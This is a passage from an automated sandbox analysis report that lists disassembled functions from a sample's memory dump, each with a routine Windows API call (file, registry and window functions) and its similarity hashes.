                                                                                                                            • String ID:
                                                                                                                            • API String ID: 716092398-0
                                                                                                                            • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                                                            • Instruction ID: 158b8484bb218b41c698b3aa21f26e2dd86497bc01e640ef524e7c8f4c0ee3c6
                                                                                                                            • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                                                            • Instruction Fuzzy Hash: 4BF019B2200510AFDB84DE9CD9C0F9773ECEB0C210B0481A6FA08CB21AD220EC108BB0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004149B4 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149EF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2492992576-0
                                                                                                                            • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                                                            • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                                                            • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                                                            • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004507C4 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450804
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 823142352-0
                                                                                                                            • Opcode ID: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                                                            • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                                                                                            • Opcode Fuzzy Hash: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                                                            • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042CCCC Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD14,?,00000001,?,?,00000000,?,0042CD66,00000000,00452A25,00000000,00452A46,?,00000000), ref: 0042CCF7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 0e0352666fd17ab1d356d9ba125a744cb1154344636c6ff56eb70bc4ed3e9319
                                                                                                                            • Instruction ID: d3c11148bbbe1678040d416a6bc301cfea82702c80b798926358c5e84281cc0e
                                                                                                                            • Opcode Fuzzy Hash: 0e0352666fd17ab1d356d9ba125a744cb1154344636c6ff56eb70bc4ed3e9319
                                                                                                                            • Instruction Fuzzy Hash: 80E065B1304304BFD701EB66EC92A5EBAACDB49754BA14876B50097592D5B86E008468
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042E8C8 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FormatMessage
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1306739567-0
                                                                                                                            • Opcode ID: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                                                            • Instruction ID: fbc307da5c1359fbfbc351051067b699ae1438aedf6613c80dda169529e76e7e
                                                                                                                            • Opcode Fuzzy Hash: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                                                            • Instruction Fuzzy Hash: BCE0206278431116F2353416AC47B77150E43C0708F944027BB90DF3D3D6AF9945D25E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041AF70 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AF9B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExtentPointText
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 566491939-0
                                                                                                                            • Opcode ID: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                                                            • Instruction ID: 6b43be1268843882f9474f888990ee0a0f71ddbfb678ee1088bae751a0726d8f
                                                                                                                            • Opcode Fuzzy Hash: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                                                            • Instruction Fuzzy Hash: E3E086F13097102BD600E67E1DC19DB77DC8A483697148177F458E7392D62DDE1A43AE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004062E8 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateWindowExA.USER32(00000000,0042367C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00406311
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 716092398-0
                                                                                                                            • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                                            • Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
                                                                                                                            • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                                            • Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042DDE4 Relevance: 1.5, APIs: 1, Instructions: 26registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2289755597-0
                                                                                                                            • Opcode ID: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                                                            • Instruction ID: 68673b5cf84413dff1d7ecec16939cb2303f89f305828e6cd22260af4b89741b
                                                                                                                            • Opcode Fuzzy Hash: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                                                            • Instruction Fuzzy Hash: EDE07EB2610119AF9B40DE8CDC81EEB37ADAB1D350F404016FA08E7200C2B4EC519BB4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00454BF8 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindClose.KERNEL32(00000000,000000FF,0047096C,00000000,00471782,?,00000000,004717CB,?,00000000,00471904,?,00000000,?,00000000), ref: 00454C0E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseFind
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1863332320-0
                                                                                                                            • Opcode ID: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                                                            • Instruction ID: 5c2dbd3a099336849a47a332199978da45cb785deb8a29a76394180ab3bc5383
                                                                                                                            • Opcode Fuzzy Hash: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                                                            • Instruction Fuzzy Hash: A1E09BB09097004BC715DF39858031A76D19FC9325F05C96AEC99CF3D7E77D84454617
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041467C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • KiUserCallbackDispatcher.NTDLL(004959E6,?,00495A08,?,?,00000000,004959E6,?,?), ref: 0041469B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2492992576-0
                                                                                                                            • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                                            • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                                                            • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                                            • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406F10 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F24
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3934441357-0
                                                                                                                            • Opcode ID: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                                                            • Instruction ID: adeaf4ebd0e6cd94d64be6b3cb299443ba394f13a0b1cd3d8337db6b6af80796
                                                                                                                            • Opcode Fuzzy Hash: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                                                            • Instruction Fuzzy Hash: 53D012722091506AD220965A6C44EAB6BDCCBC5770F11063AB558C2181D7209C01C675
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042364C Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004235F8: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042360D
                                                                                                                            • ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                                              • Part of subcall function 00423628: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423644
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoParametersSystem$ShowWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3202724764-0
                                                                                                                            • Opcode ID: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                                                            • Instruction ID: 3e39ddd90fb628193caaea160b6f4ed5bf244f394cc2da11a07db6b12dca8b82
                                                                                                                            • Opcode Fuzzy Hash: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                                                            • Instruction Fuzzy Hash: 34D05E123821703142307ABB280699B46EC8D822EB389043BB5449B312ED5DCE01116C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004242C4 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: TextWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 530164218-0
                                                                                                                            • Opcode ID: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                                                            • Instruction ID: e359d8c046b4275bb87a72ac3440150ee0889cd0e7de0465f76ccf46c1161c2e
                                                                                                                            • Opcode Fuzzy Hash: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                                                            • Instruction Fuzzy Hash: 81D05EE27011602BCB01BAED54C4AC667CC9B8D25AB1840BBF904EF257D638CE40C398
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00466B40 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2492992576-0
                                                                                                                            • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                                            • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                                                            • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                                            • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042CD24 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,004515CB,00000000), ref: 0042CD2F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 9f26b129d564bfe00fcaedc41dfc35f11866fd4db5ee91d95e6c1a36d58de6ea
                                                                                                                            • Instruction ID: 53db4a1afaa3b7bebcc80daf879f764776582c58df104e6651e2d127eece83ed
                                                                                                                            • Opcode Fuzzy Hash: 9f26b129d564bfe00fcaedc41dfc35f11866fd4db5ee91d95e6c1a36d58de6ea
                                                                                                                            • Instruction Fuzzy Hash: 48C08CE03222001A9E60A6BD2CC551F06CC891423A3A41E3BB129EB2E2D23D88162818
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406EC0 Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A6D4,0040CC80,?,00000000,?), ref: 00406EDD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 823142352-0
